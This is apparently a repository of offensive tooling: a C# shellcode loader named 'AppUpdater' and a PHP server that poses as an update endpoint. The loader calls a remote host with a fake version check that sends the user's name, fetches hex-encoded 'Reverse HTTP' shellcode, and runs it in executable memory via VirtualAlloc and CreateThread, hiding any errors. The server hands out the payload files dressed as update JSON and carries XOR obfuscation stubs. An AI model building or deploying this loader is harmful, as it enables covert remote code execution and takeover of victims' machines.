├── .gitattributes
├── C# Shellcode Loader
    ├── AppUpdater.sln
    └── AppUpdater
    │   ├── App.config
    │   ├── AppUpdater.csproj
    │   ├── Program.cs
    │   └── Properties
    │       └── AssemblyInfo.cs
├── Office Macro Shellcode Loader
    └── Office Macro Shellcode Loader.txt
└── Shellcode Server
    └── updates.php


/.gitattributes:
--------------------------------------------------------------------------------
1 | # Auto detect text files and perform LF normalization
2 | * text=auto
3 | 


--------------------------------------------------------------------------------
/C# Shellcode Loader/AppUpdater.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio 15
 4 | VisualStudioVersion = 15.0.27004.2009
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "AppUpdater", "AppUpdater\AppUpdater.csproj", "{437839B9-D6D7-48C3-8D24-83146CE5C946}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|Any CPU = Debug|Any CPU
11 | 		Release|Any CPU = Release|Any CPU
12 | 	EndGlobalSection
13 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | 		{437839B9-D6D7-48C3-8D24-83146CE5C946}.Debug|Any CPU.ActiveCfg = Release|Any CPU
15 | 		{437839B9-D6D7-48C3-8D24-83146CE5C946}.Debug|Any CPU.Build.0 = Release|Any CPU
16 | 		{437839B9-D6D7-48C3-8D24-83146CE5C946}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | 		{437839B9-D6D7-48C3-8D24-83146CE5C946}.Release|Any CPU.Build.0 = Release|Any CPU
18 | 	EndGlobalSection
19 | 	GlobalSection(SolutionProperties) = preSolution
20 | 		HideSolutionNode = FALSE
21 | 	EndGlobalSection
22 | 	GlobalSection(ExtensibilityGlobals) = postSolution
23 | 		SolutionGuid = {B9E53434-41A3-4C7D-968C-149A9986BE73}
24 | 	EndGlobalSection
25 | EndGlobal
26 | 


--------------------------------------------------------------------------------
/C# Shellcode Loader/AppUpdater/App.config:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <configuration>
3 |     <startup> 
4 |         
5 |     <supportedRuntime version="v2.0.50727"/></startup>
6 | </configuration>
7 | 


--------------------------------------------------------------------------------
/C# Shellcode Loader/AppUpdater/AppUpdater.csproj:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
 4 |   <PropertyGroup>
 5 |     <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
 6 |     <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
 7 |     <ProjectGuid>{437839B9-D6D7-48C3-8D24-83146CE5C946}</ProjectGuid>
 8 |     <OutputType>WinExe</OutputType>
 9 |     <RootNamespace>AppUpdater</RootNamespace>
10 |     <AssemblyName>AppUpdater</AssemblyName>
11 |     <TargetFrameworkVersion>v3.5</TargetFrameworkVersion>
12 |     <FileAlignment>512</FileAlignment>
13 |     <TargetFrameworkProfile />
14 |   </PropertyGroup>
15 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
16 |     <PlatformTarget>AnyCPU</PlatformTarget>
17 |     <DebugSymbols>true</DebugSymbols>
18 |     <DebugType>full</DebugType>
19 |     <Optimize>false</Optimize>
20 |     <OutputPath>bin\Debug\</OutputPath>
21 |     <DefineConstants>DEBUG;TRACE</DefineConstants>
22 |     <ErrorReport>prompt</ErrorReport>
23 |     <WarningLevel>4</WarningLevel>
24 |   </PropertyGroup>
25 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
26 |     <PlatformTarget>AnyCPU</PlatformTarget>
27 |     <DebugType>pdbonly</DebugType>
28 |     <Optimize>true</Optimize>
29 |     <OutputPath>bin\Release\</OutputPath>
30 |     <DefineConstants>TRACE</DefineConstants>
31 |     <ErrorReport>prompt</ErrorReport>
32 |     <WarningLevel>4</WarningLevel>
33 |   </PropertyGroup>
34 |   <PropertyGroup>
35 |     <StartupObject />
36 |   </PropertyGroup>
37 |   <ItemGroup>
38 |     <Reference Include="System" />
39 |     <Reference Include="System.Core" />
40 |     <Reference Include="System.Windows.Forms" />
41 |     <Reference Include="System.Xml.Linq" />
42 |     <Reference Include="System.Data.DataSetExtensions" />
43 |     <Reference Include="Microsoft.CSharp" />
44 |     <Reference Include="System.Data" />
45 |     <Reference Include="System.Net.Http" />
46 |     <Reference Include="System.Xml" />
47 |   </ItemGroup>
48 |   <ItemGroup>
49 |     <Compile Include="Program.cs" />
50 |     <Compile Include="Properties\AssemblyInfo.cs" />
51 |   </ItemGroup>
52 |   <ItemGroup>
53 |     <None Include="App.config" />
54 |   </ItemGroup>
55 |   <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
56 | </Project>


--------------------------------------------------------------------------------
/C# Shellcode Loader/AppUpdater/Program.cs:
--------------------------------------------------------------------------------
  1 | //CHANGE YO HASH
  2 | using System;
  3 | using System.Net;
  4 | using System.Runtime.InteropServices;
  5 | 
  6 | namespace AppUpdater
  7 | {
  8 |     public partial class Program
  9 |     {
 10 |         [DllImport("kernel32")]
 11 |         private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr, UIntPtr size, IntPtr flAllocationType, IntPtr flProtect);
 12 |         [DllImport("kernel32")]
 13 |         private static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr param, uint dwCreationFlags, ref IntPtr lpThreadId);
 14 |         [DllImport("kernel32")]
 15 |         private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
 16 |         static void Main(string[] args)
 17 |         {
 18 |             try
 19 |             {
 20 |                 WebClient wc = new WebClient();
 21 |                 //add webpage status check
 22 |                 //https://stackoverflow.com/questions/1344221/how-can-i-generate-random-alphanumeric-strings-in-c
 23 | 
 24 |                 /*To be added - Rough authentication
 25 |                 Random random = new Random();
 26 |                 const string chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";                
 27 |                 string randomString = new string(Enumerable.Repeat(chars, 24).Select(s => s[random.Next(s.Length)]).ToArray());
 28 |                 */
 29 | 
 30 |                 string updateString = wc.DownloadString("http://192.168.1.1/api/updates.php?action=versioncheck&user=" + Environment.UserName);
 31 |                 string binaryLoad = null;
 32 |                 if (updateString.Contains("2.0.2"))
 33 |                 {
 34 |                     if (IntPtr.Size == 4)
 35 |                     {
 36 |                         binaryLoad = wc.DownloadString("http://192.168.1.1/api/updates.php?action=update&arch=x86&user=" + Environment.UserName);
 37 |                     }
 38 |                     else if (IntPtr.Size == 8)
 39 |                     {
 40 |                         binaryLoad = wc.DownloadString("http://192.168.1.1/api/updates.php?action=update&arch=x64&user=" + Environment.UserName);
 41 |                     }
 42 |                     else
 43 |                     {
 44 |                         binaryLoad = wc.DownloadString("http://192.168.1.1/api/updates.php?error=true");
 45 |                         return;
 46 |                     }
 47 |                     //add webpage status check
 48 | 
 49 |                     string[] updateBinary = binaryLoad.Split('|');
 50 |                     string stringStep = updateBinary[1].Replace(" ", String.Empty);                    
 51 |                     byte[] binaryPatch = ToByteArray(stringStep);
 52 | 
 53 |                     try
 54 |                     {
 55 |                         IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)(binaryPatch.Length + 1), (IntPtr)0x1000, (IntPtr)0x40);
 56 |                         Marshal.Copy(binaryPatch, 0, funcAddr, binaryPatch.Length);
 57 | 
 58 |                         IntPtr hThread = IntPtr.Zero;
 59 |                         IntPtr threadId = IntPtr.Zero;
 60 |                         IntPtr pinfo = IntPtr.Zero;
 61 | 
 62 |                         hThread = CreateThread(IntPtr.Zero, (uint)binaryPatch.Length, funcAddr, pinfo, 0, ref threadId);
 63 |                         WaitForSingleObject(hThread, 0xFFFFFFFF);
 64 |                     }
 65 |                     catch
 66 |                     {
 67 |                         //string log = "Something went wrong";
 68 |                         //System.IO.File.WriteAllText(@"C:\log.txt", log);
 69 |                     }
 70 |                 }
 71 |             }
 72 |             catch
 73 |             { }
 74 |         }
 75 |         public static byte[] ToByteArray(String HexString)
 76 |         {
 77 |             int NumberChars = HexString.Length;
 78 |             byte[] bytes = new byte[NumberChars / 2];
 79 |             for (int i = 0; i < NumberChars; i += 2)
 80 |             {
 81 |                 bytes[i / 2] = Convert.ToByte(HexString.Substring(i, 2), 16);
 82 |             }
 83 |             return bytes;
 84 |         }
 85 | 
 86 |         //https://stackoverflow.com/questions/38816004/simple-string-encryption-without-dependencies
 87 |         /*
 88 |         public static string Scramble(string input)
 89 |         {
 90 |             //AM34
 91 |             byte xorConstant = 0x34;
 92 |            
 93 |             byte[] data = Encoding.UTF8.GetBytes(input);
 94 |             for (int i = 0; i < data.Length; i++)
 95 |             {
 96 |                 data[i] = (byte)(data[i] ^ xorConstant);
 97 |             }
 98 |             string output = Convert.ToBase64String(data);
 99 |             return output;
100 |         }
101 |         */
102 |     }
103 | }
104 | 


--------------------------------------------------------------------------------
/C# Shellcode Loader/AppUpdater/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
 1 | using System.Reflection;
 2 | using System.Runtime.CompilerServices;
 3 | using System.Runtime.InteropServices;
 4 | 
 5 | // General Information about an assembly is controlled through the following
 6 | // set of attributes. Change these attribute values to modify the information
 7 | // associated with an assembly.
 8 | [assembly: AssemblyTitle("AppUpdater")]
 9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("AppUpdater")]
13 | [assembly: AssemblyCopyright("Copyright ©  2017")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 | 
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components.  If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 | 
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("437839b9-d6d7-48c3-8d24-83146ce5c946")]
24 | 
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | //      Major Version
28 | //      Minor Version
29 | //      Build Number
30 | //      Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 | 


--------------------------------------------------------------------------------
/Office Macro Shellcode Loader/Office Macro Shellcode Loader.txt:
--------------------------------------------------------------------------------
1 | Later
2 | 


--------------------------------------------------------------------------------
/Shellcode Server/updates.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | //session_start();
 3 | $action = $_GET["action"];
 4 | 
 5 | //$xor_key = "4";
 6 | //$string = xorIt(base64_decode($safety), $xor_key, 1);
 7 | 
 8 | if($action === "versioncheck")
 9 | {
10 | 	echo "{ \"AppUpdater\" {
11 |      	\"update\": \"true,\"
12 |      	\"version\": \"2.0.2\"
13 |      	}";
14 | }
15 | 
16 | if($action === "update")
17 | {
18 | 	$arch = $_GET["arch"];
19 | 	echo "{ \"AppUpdater\" {
20 | 	\"update\": \"true,\"
21 | 	\"version\": \"2.0.2\",";
22 | 	if($arch === "x86")
23 | 	{		
24 | 		$payloadx86 = file_get_contents("payload_x86.xyz");		
25 | 		echo "\"architecture\": \"x86\" \"update code\": ";		
26 | 		#Reverse HTTP
27 | 		echo "\"|".$payloadx86."|\" }"; 
28 | 	}
29 | 	elseif($arch === "x64")
30 | 	{
31 | 		$payloadx64 = file_get_contents("payload_x64.xyz");
32 | 		echo "\"architecture\": \"x64\" \"update code\": ";
33 | 		#Reverse HTTP
34 | 		echo "\"|".$payloadx64."|\" }"; 
35 | 	}
36 | 	else
37 | 	{
38 | 		echo "\"architecture\": \"error\" }";
39 | 	}
40 | 	echo " }";
41 | }
42 | 
43 | //http://www.codelibary.com/snippet/1077/xor-encrypt-decrypt
44 |  
45 | function xorIt($string, $key, $type = 0)
46 | {
47 |         $sLength = strlen($string);
48 |         $xLength = strlen($key);
49 |         for($i = 0; $i < $sLength; $i++) {
50 | 		if ($type == 1) {
51 |                 	//decrypt
52 |                         $string[$i] = $key^$string[$i];                              
53 |                 } 
54 | 		else {
55 |                 	//crypt
56 |                         $string[$i] = $string[$i]^$key;
57 |                 }                
58 |         }
59 |         return $string;
60 | }
61 | ?>


--------------------------------------------------------------------------------